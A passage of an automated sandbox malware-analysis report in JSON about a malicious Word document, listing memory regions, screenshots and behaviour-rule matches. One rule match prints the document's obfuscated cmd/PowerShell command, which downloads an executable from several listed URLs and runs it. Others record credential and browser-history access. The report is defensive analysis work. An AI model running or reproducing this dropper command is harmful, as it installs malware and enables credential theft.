"private_memory", "start_va": 4128768, "timestamp": "00:02:14.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_2802", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:02:14.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 327680, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_2803", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:02:14.735", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_2804", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:02:14.735", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1952841728, "type": "region", "version": 1 }, "end_va": 1952866303, "entry_point": 1952841728, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_2805", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1952841728, "timestamp": "00:02:14.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 0, "filename": null, "id": "region_2806", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:02:14.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_2807", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:02:14.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 48037888, "type": "region", "version": 1 }, "end_va": 49086463, "entry_point": 0, "filename": null, "id": "region_2808", "name": "private_0x0000000002dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48037888, "timestamp": "00:02:14.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1959788544, "type": "region", "version": 1 }, "end_va": 1960325119, "entry_point": 1959788544, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2809", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1959788544, "timestamp": "00:02:14.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_2810", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:02:14.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_2811", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:02:14.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1952817151, "entry_point": 1952448512, "filename": "\\Windows\\SysWOW64\\netprofm.dll", "id": "region_2812", "name": "netprofm.dll", "norm_filename": "c:\\windows\\syswow64\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:02:14.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952440319, "entry_point": 1952382976, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2813", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:02:14.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42532863, "entry_point": 0, "filename": null, "id": "region_2814", "name": "private_0x0000000002850000", "norm_filename": null, "region_type": "private_memory", "start_va": 42270720, "timestamp": "00:02:14.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43450368, "type": "region", "version": 1 }, "end_va": 43712511, "entry_point": 0, "filename": null, "id": "region_2815", "name": "private_0x0000000002970000", "norm_filename": null, "region_type": "private_memory", "start_va": 43450368, "timestamp": "00:02:14.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49086464, "type": "region", "version": 1 }, "end_va": 50135039, "entry_point": 0, "filename": null, "id": "region_2816", "name": "private_0x0000000002ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49086464, "timestamp": "00:02:14.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1952317440, "type": "region", "version": 1 }, "end_va": 1952350207, "entry_point": 1952317440, "filename": "\\Windows\\SysWOW64\\npmproxy.dll", "id": "region_2817", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\syswow64\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1952317440, "timestamp": "00:02:14.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_2818", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:02:14.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1952251904, "type": "region", "version": 1 }, "end_va": 1952317439, "entry_point": 1952251904, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_2944", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1952251904, "timestamp": "00:02:15.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1952120832, "type": "region", "version": 1 }, "end_va": 1952194559, "entry_point": 1952120832, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_2945", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1952120832, "timestamp": "00:02:15.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1951858688, "type": "region", "version": 1 }, "end_va": 1952104447, "entry_point": 1951858688, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_2946", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1951858688, "timestamp": "00:02:15.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1951793152, "type": "region", "version": 1 }, "end_va": 1951825919, "entry_point": 1951793152, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_2947", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1951793152, "timestamp": "00:02:15.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1951727616, "type": "region", "version": 1 }, "end_va": 1951748095, "entry_point": 1951727616, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_2948", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1951727616, "timestamp": "00:02:15.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1951662080, "type": "region", "version": 1 }, "end_va": 1951686655, "entry_point": 1951662080, "filename": "\\Windows\\SysWOW64\\wship6.dll", "id": "region_2949", "name": "wship6.dll", "norm_filename": "c:\\windows\\syswow64\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1951662080, "timestamp": "00:02:15.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1951399936, "type": "region", "version": 1 }, "end_va": 1951629311, "entry_point": 1951399936, "filename": "\\Windows\\SysWOW64\\FWPUCLNT.DLL", "id": "region_2950", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\syswow64\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1951399936, "timestamp": "00:02:15.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_2951", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:02:17.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 43253759, "entry_point": 0, "filename": null, "id": "region_2952", "name": "private_0x0000000002900000", "norm_filename": null, "region_type": "private_memory", "start_va": 42991616, "timestamp": "00:02:17.308", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "ihknzkjo.doc", "id": 20386, "md5_hash": "74008c237f9382ac5a6472d097687a8b", "sample_type": "word_document", "sha1_hash": "678dc05873c09fd280da2030aa630b0b42d986ad", "sha256_hash": "607aa428401fe8e6d66583cdfc43a7879b1173c0d116a1e53ebd4e044511bfd1", "size": 162304, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 101207, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_16122.png", "size": 251752, "thumbnail_archive_path": "screenshots/thumbnail_16122.png", "timestamp": "00:00:16.122", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_17150.png", "size": 254710, "thumbnail_archive_path": "screenshots/thumbnail_17150.png", "timestamp": "00:00:17.150", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_21235.png", "size": 56894, "thumbnail_archive_path": "screenshots/thumbnail_21235.png", "timestamp": "00:00:21.235", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_22236.png", "size": 105080, "thumbnail_archive_path": "screenshots/thumbnail_22236.png", "timestamp": "00:00:22.236", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_28327.png", "size": 103022, "thumbnail_archive_path": "screenshots/thumbnail_28327.png", "timestamp": "00:00:28.327", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_77487.png", "size": 104159, "thumbnail_archive_path": "screenshots/thumbnail_77487.png", "timestamp": "00:01:17.487", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_86610.png", "size": 939333, "thumbnail_archive_path": "screenshots/thumbnail_86610.png", "timestamp": "00:01:26.610", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_87624.png", "size": 938818, "thumbnail_archive_path": "screenshots/thumbnail_87624.png", "timestamp": "00:01:27.624", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_88627.png", "size": 932523, "thumbnail_archive_path": "screenshots/thumbnail_88627.png", "timestamp": "00:01:28.627", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_89635.png", "size": 488649, "thumbnail_archive_path": "screenshots/thumbnail_89635.png", "timestamp": "00:01:29.635", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_106524.png", "size": 4187, "thumbnail_archive_path": "screenshots/thumbnail_106524.png", "timestamp": "00:01:46.524", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_108545.png", "size": 488494, "thumbnail_archive_path": "screenshots/thumbnail_108545.png", "timestamp": "00:01:48.545", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_120389.png", "size": 1006413, "thumbnail_archive_path": "screenshots/thumbnail_120389.png", "timestamp": "00:02:00.389", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-10-17 16:08", "analyzer_version": "2.2.0", "chrome_version": "59.0.3071.115", "firefox_version": "25.0", "flash_version": "11.2.202.233", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.710", "microsoft_excel_version": "16.0.4266.1003", "microsoft_office_version": "16.0.4266.1003", "microsoft_power_point_version": "16.0.4266.1003", "microsoft_project_version": "16.0.4266.1003", "microsoft_publisher_version": "16.0.4266.1003", "microsoft_visio_version": "16.0.4266.1003", "microsoft_word_version": "16.0.4266.1003", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_391", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! \".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) \".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_480", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1146", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "108.163.227.35", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"www.indpts.com\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1182", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\Public\\3292.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1368", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1598", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" \"C:\\ProgramData\\FB6F.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1654", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" /scomma \"C:\\ProgramData\\FB70.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1675", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" /scomma \"C:\\ProgramData\\FB2F.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "hashes": [ { "md5_hash": "009e3e410a28a8e518f2c6ac83306724", "sha1_hash": "121b97b6c22d60d1dedc8d0160c86e8b9afa5089", "sha256_hash": "960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_history", "operation_desc": "Read data related to browsing history", "ref_gfncalls": [ { "ref_id": "gfn_1774", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_history", "technique_desc": "Read the browsing history for \"Microsoft Internet Explorer\".", "technique_path": "built_in._browser._browser_data_history.vmray_read_browser_history", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\apple computer\\preferences\\keychain.plist", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_info_stealing", "category_desc": "Information Stealing", "operation": "_read_browser_data", "operation_desc": "Read browser data", "ref_gfncalls": [ { "ref_id": "gfn_2525", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_readout_browser_credentials", "technique_desc": "Possibly trying to readout browser credentials.", "technique_path": "built_in._info_stealing._read_browser_data.vmray_readout_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\I705BA84C", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3432", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, 